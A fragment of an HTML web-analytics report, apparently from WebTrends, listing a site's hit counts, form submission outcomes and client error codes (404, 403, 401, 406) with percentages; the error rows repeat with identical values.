<!-- WT_EXCEL_SHEET_NAME>Technical Statistics</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Total Hits</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">66711</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Successful Hits</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">63026</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Failed Hits</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">3685</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Failed Hits as Percent</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.52%</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Cached Hits</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">6454</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Cached Hits as Percent</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.67%</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
<!-- ---- ---- -->
><HR><P>
</BODY>
<!-- ---- ---- -->
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopFormErrors"><!--Technical Statistics::Forms Submitted By Users--></A>
<!-- WT_H1>Forms Submitted By Users</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Forms Submitted By Users</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section shows the number of successful form submissions compared to the number that failed. WebTrends considers anything with Post command as a form.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index15.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, 4, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Forms Submitted By Users</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Forms Submitted By Users</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Type</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Successful Forms Submitted</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">88.88%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Failed Forms Submitted</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.11%</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>18</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopClientErrors"><!--Technical Statistics::Client Errors--></A>
<!-- WT_H1>Client Errors</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Client Errors</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the type of errors which were returned by the Client accessing your server.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index16.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, 4, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Client Errors</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Client Errors</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Error</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>404 Page or File Not Found </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>3388</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>96.8%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>403 Forbidden Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>102</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>2.91%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>401 Unauthorized Access </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>6</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.17%</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>406 Incomplete / Undefined </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>4</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>0.11%</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
